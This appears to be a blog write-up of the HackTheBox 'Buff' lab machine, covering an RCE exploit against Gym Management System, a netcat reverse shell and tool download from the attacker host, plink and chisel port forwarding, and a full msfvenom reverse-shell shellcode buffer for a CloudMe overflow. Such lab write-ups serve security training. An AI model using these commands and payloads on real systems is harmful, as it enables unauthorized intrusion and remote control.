This page looks best with JavaScript enabled

HackTheBox: Buff

 ·  ☕ 4 min read


Started by enumerating ports:

root@osboxes:~# scan
[*] OS based on TTL
[*] TCP Scan
Open ports: 7680,8080
7680/tcp open  pando-pub?
8080/tcp open  http       Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut
[*] Execution time:
	 TTL: 0
	 Furious: 132
	 Nmap: 71
	 Total: 203


Manually enumerated the web until I got that is using Gym Management Software 1.0:

Found a exploit for that particular CMS:

root@osboxes:~/Downloads# searchsploit gym
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                      |  Path
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Gym Management System 1.0 - Unauthenticated Remote Code Execution                                                                                   | php/webapps/
WordPress Plugin WPGYM - SQL Injection                                                                                                              | php/webapps/42801.txt
---------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
root@osboxes:~/Downloads# searchsploit -m 48506
  Exploit: Gym Management System 1.0 - Unauthenticated Remote Code Execution
     Path: /usr/share/exploitdb/exploits/php/webapps/
File Type: Python script, ASCII text executable, with CRLF line terminators

Copied to: /root/Downloads/

Then used the exploit to get a reverse shell:

root@osboxes:~/Documents/Buff# python
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 443

To download the needed files use powershell Invoke-WebRequest "http://<YOUR-IP>:8000/FILE" -OutFile "C:\OUT_DIR\FILENAME"


After some enumeration found a weird file:

 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7

 Directory of C:\Users\shaun\Downloads

30/07/2020  00:29    <DIR>          .
30/07/2020  00:29    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe
               1 File(s)     17,830,824 bytes
               2 Dir(s)   6,235,152,384 bytes free

Made a research and found a BOF exploit

As the victim doesn’t have python let’s redirect the port that CloudMe uses to our host:

C:\xampp\htdocs\gym\upload>plink.exe -l root -pw root  -R 4444:
plink.exe -l root -pw root  -R 4444:
plink.exe -l root -pw root  -R 4444:
The server's host key is not cached in the registry. You
have no guarantee that the server is the computer you
think it is.
The server's ssh-ed25519 key fingerprint is:
ssh-ed25519 255 b1:bd:fd:b1:60:8a:6f:8a:02:11:f0:79:f5:3a:a2:af
If you trust this host, enter "y" to add the key to
PuTTY's cache and carry on connecting.
If you want to carry on connecting just once, without
adding the key to the cache, enter "n".
If you do not trust this host, press Return to abandon the
Store key in cache? (y/n) y
Using username "root".
Linux osboxes 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jul 29 21:23:02 2020 from

Alternatively you could use chisel:

chisel server -p 3232 -reverse -v
SharpChisel.exe client R:

Then created our own shell code payload using msfvenom:

root@osboxes:~/Downloads# msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=5555 -a x86 -b '\x00\x0a\x0d' -e x86/shikata_ga_nai -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1712 bytes
buf =  b""
buf += b"\xdb\xcc\xd9\x74\x24\xf4\xba\x46\xc9\x1f\xe1\x5b\x29"
buf += b"\xc9\xb1\x52\x31\x53\x17\x03\x53\x17\x83\xad\x35\xfd"
buf += b"\x14\xcd\x2e\x80\xd7\x2d\xaf\xe5\x5e\xc8\x9e\x25\x04"
buf += b"\x99\xb1\x95\x4e\xcf\x3d\x5d\x02\xfb\xb6\x13\x8b\x0c"
buf += b"\x7e\x99\xed\x23\x7f\xb2\xce\x22\x03\xc9\x02\x84\x3a"
buf += b"\x02\x57\xc5\x7b\x7f\x9a\x97\xd4\x0b\x09\x07\x50\x41"
buf += b"\x92\xac\x2a\x47\x92\x51\xfa\x66\xb3\xc4\x70\x31\x13"
buf += b"\xe7\x55\x49\x1a\xff\xba\x74\xd4\x74\x08\x02\xe7\x5c"
buf += b"\x40\xeb\x44\xa1\x6c\x1e\x94\xe6\x4b\xc1\xe3\x1e\xa8"
buf += b"\x7c\xf4\xe5\xd2\x5a\x71\xfd\x75\x28\x21\xd9\x84\xfd"
buf += b"\xb4\xaa\x8b\x4a\xb2\xf4\x8f\x4d\x17\x8f\xb4\xc6\x96"
buf += b"\x5f\x3d\x9c\xbc\x7b\x65\x46\xdc\xda\xc3\x29\xe1\x3c"
buf += b"\xac\x96\x47\x37\x41\xc2\xf5\x1a\x0e\x27\x34\xa4\xce"
buf += b"\x2f\x4f\xd7\xfc\xf0\xfb\x7f\x4d\x78\x22\x78\xb2\x53"
buf += b"\x92\x16\x4d\x5c\xe3\x3f\x8a\x08\xb3\x57\x3b\x31\x58"
buf += b"\xa7\xc4\xe4\xcf\xf7\x6a\x57\xb0\xa7\xca\x07\x58\xad"
buf += b"\xc4\x78\x78\xce\x0e\x11\x13\x35\xd9\x14\xee\x3a\xd8"
buf += b"\x41\xec\x44\xcf\x22\x79\xa2\x85\x54\x2c\x7d\x32\xcc"
buf += b"\x75\xf5\xa3\x11\xa0\x70\xe3\x9a\x47\x85\xaa\x6a\x2d"
buf += b"\x95\x5b\x9b\x78\xc7\xca\xa4\x56\x6f\x90\x37\x3d\x6f"
buf += b"\xdf\x2b\xea\x38\x88\x9a\xe3\xac\x24\x84\x5d\xd2\xb4"
buf += b"\x50\xa5\x56\x63\xa1\x28\x57\xe6\x9d\x0e\x47\x3e\x1d"
buf += b"\x0b\x33\xee\x48\xc5\xed\x48\x23\xa7\x47\x03\x98\x61"
buf += b"\x0f\xd2\xd2\xb1\x49\xdb\x3e\x44\xb5\x6a\x97\x11\xca"
buf += b"\x43\x7f\x96\xb3\xb9\x1f\x59\x6e\x7a\x2f\x10\x32\x2b"
buf += b"\xb8\xfd\xa7\x69\xa5\xfd\x12\xad\xd0\x7d\x96\x4e\x27"
buf += b"\x9d\xd3\x4b\x63\x19\x08\x26\xfc\xcc\x2e\x95\xfd\xc4"

Finally updated the exploit with it and created an opening connection with ncat:

root@osboxes:~# rlwrap nc -lvnp 5555
listening on [any] 5555 ...
connect to [] from (UNKNOWN) [] 49842
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

Share on

InTernet lover